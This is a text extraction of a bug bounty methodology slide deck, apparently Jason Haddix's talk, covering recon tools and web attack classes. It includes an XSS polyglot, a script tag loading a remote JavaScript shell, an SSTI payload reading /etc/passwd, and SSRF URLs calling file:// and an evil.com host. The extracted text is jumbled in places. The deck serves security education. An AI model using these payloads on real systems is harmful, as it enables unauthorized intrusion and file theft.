TBHM2.1 (P)
TBHM2.1 (P)
TBHM2.1 (P)
Methodology v2.1
whoami
Hack
Stuff
Better
(and practically)
And…LOTS of memes…. only some are funny
history && topics
★ philosophy shifts
Aka “How to Shot Web” @ DEFCON23
★ discovery techniques ★ Subdomain & Discovery
★ mapping methodology ★ SQLi
★ parameters oft attacked ★ XSS
★ useful fuzz strings ★ File Uploads
★ bypass or filter evasion techniques ★ CSRF
★ new/awesome tooling ★ Privilege, Auth, IDOR
★ memes
v2
★ MOAR discovery
★ xss ★ Infrastructure and config
★ ssti ★ WAF
★ ssrf ★ SOAP Testing
★ Code Inj / cmdi /
advancements in
fuzzing
light reading
Discovering New Targets
Discovery
★ Plazmaz Fork
★ Fleetcaptain fork
Sublist3r
★ Fleetcaptain fork
Sub Scraping
ThreatCrowd Virustotal
★ Cloudflare
★ Censys.io
★ Haven't tested but love
the ideas
Sub Bruting
all.txt
https://gist.github.com/jhaddix/86a06c5dc309d085
80a018c66354a056
Acquisitions
★ Crunchbase
★ wikipedia
Port Scanning
65536 unverified Hosts (a large targets ASN)
Tool Time to run Found
nmap zzz
∞
Interlude... credential bruteforce
Brutespray
Nmap service
masscan credential https://github.com/x90skysn3k/brutespray
scan -oG
bruteforce
★ Gobuster
★ Burp content discovery
★ Robots disallowed
★ ¯\_(ツ)_/¯
CommonSpeak and
Scans.io data
★ Subdomain data is
awesome
Parameter Bruting?
★ Yep! - Untested but love the idea
★ Can be combined with backslash scanners top 2500 alexa params
Domain Domain
Identify IPs bruteforcing, Visual
scraping for Portscan
and main TLDs Resolve && add Identification
discovered TLDs new IP ranges
ASNs enumall
Reverse Whois Massdns masscan
sublist3r eyewitness
Acquisitions Manual
++
++
1 Jamie: I really
enjoy my super
Frans: I really admin access
enjoy my NEW this morning !!!
super admin
access this
morning !!! “><script src=//y.vg></script> 2
4
l !!#!
vascript shel
Y.vg is a a ja
3
XSSHunter
Payload:
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert()
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csV
g/<sVg/oNloAd=alert()//>\x3e
Jackmasa’s
XSS
Mindmap
https://github.com/jhaddix/XSS.png
Server Side Template
Injection
SSTI
TBHMv1
❏ Nothing
1: https://acme.com/errorpage{{2*3}}
2:
https://acme.com/errorpage{{''.__class__.__mro__[2].__subclasses__
()[40]('/etc/passwd').read() }}
SSTI Tooling
Server Side Template Injection & Logic
/ Debug parameters
preview redirect
id
view
activity
name
http://acme.com/script?name={{2*3}}
Server Side Request
Forgery
SSRF Common Parameters or Injection
points from TBHMv1
TBHMv1 ★ Where? file= folder=
❏ Nothing ★ Resources
❏ Well kinda... SSRF ○ SSRF Bible (black magic)
location= style=
http://ACME.com/redirect.php?url=file:///etc/passwd
http://acme.com/ssrf.php?url=tftp://evil.com:12346/TESTPACKET
SSRF Resources
SSRF Resources
★ protocol
and
schema
mappings
★ Exploit
examples
Server Side Request Forgery
{regex + perm} dest {regex} redirect {regex + perm} uri {regex} path
{regex} port
http://acme.com/script?uri=ftp://site
Code Inj, CDMi, & Future
Fuzzing, ++
Code Injection + CMD
Injection + New Fuzzing
TBHMv1
❏ Sqli ★ Commix
❏ Polyglot ○ CMDi
❏ Seclists ○ Supports php code inj
❏ Sqlmap ★ Unknown Identification
❏ Params ○ Backslash Powered Scanner
❏ Tooling ★ resources
❏ resources albinowax (James Kettle)
IDOR - MFLAC
★ IDs
★ Hashes
★ Emails
Insecure Direct Object Reference
http://acme.com/script?user=21856
Code Injection + CMD
Injection
★ Commix pros
○ Command injection
○ Supports php code inj
○ Custom modules
○ PS & PY shells
○ Put many memes in their slides
Backslash Powered Scanner
★ Generic payloads for any stack
○ Send a ‘ get an error
○ Send a \‘ and the backslash escapes your injection
character
★ Multi-tiered, Simple, and effective response analyzing
○ Response code
○ Response size
○ keywords
★ Watch the video then read the paper =)
○ https://broadcast.comdi.com/r7rwcspee75eewbu8a0f
○ http://blog.portswigger.net/2016/11/backslash-pow
ered-scanning-hunting.html
Infrastructure & Config
Subdomain takeover!
★ Dev.domain.com
★ Stage.domain.com
★ ww1/ww2/ww3...domain.com
★ www.domain.uk/jp/...
★ ...
★ https://twitter.com/Jhaddix/status/964714566910279680
SOAP Services
Bespoke .nfo
Bespoke .nfo
resources!
SSRF Pivoting from blind SSRF to RCE with HashiCorp http://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF
Resources
Consul - Peter Adkins -to-RCE-with-Hashicorp-Consul.html
Resources
Consul - Peter Adkins -to-RCE-with-Hashicorp-Consul.html
Resources
OWASP SSTI Workshop - https://speakerdeck.com/owaspmontreal/workshop-server-side-template-i
Gérôme Dieu njection-ssti
Hi Pete!
Rails Dynamic Render to https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-201
RCE (CVE-2016-0752) - 6-0752/
John Poulin
aboul3la https://github.com/aboul3la/Sublist3r
jhaddix https://github.com/jhaddix/domain
blechschmidt https://github.com/blechschmidt/massdns
robertdavidgraham https://github.com/robertdavidgraham/masscan
anshumanbh https://github.com/anshumanbh/brutesubs
OJ Reeves https://github.com/OJ/gobuster
Links epinna https://github.com/epinna/tplmap
https://github.com/mak-/parameth
https://gist.github.com/anshumanbh/96a0b81dfe318e9e9560
13209e178fa9
https://github.com/ChrisTruncer/EyeWitness
https://github.com/jackmasa/XSS.png
https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66
354a056
https://github.com/lorenzog/dns-parallel-prober
Links SSRF Bible https://docs.google.com/document/d/1v1TkWZtrhzRLy0bY
XBcdLUedXGb9njTNIJXa3u9akHM/edit#
https://github.com/ewilded/psychoPATH
https://github.com/commixproject/commix
Links https://github.com/qazbnm456/awesome-web-security
https://github.com/infoslack/awesome-web-hacking
https://github.com/djadmin/awesome-bug-bounty
Jason Haddix - @jhaddix
[email protected]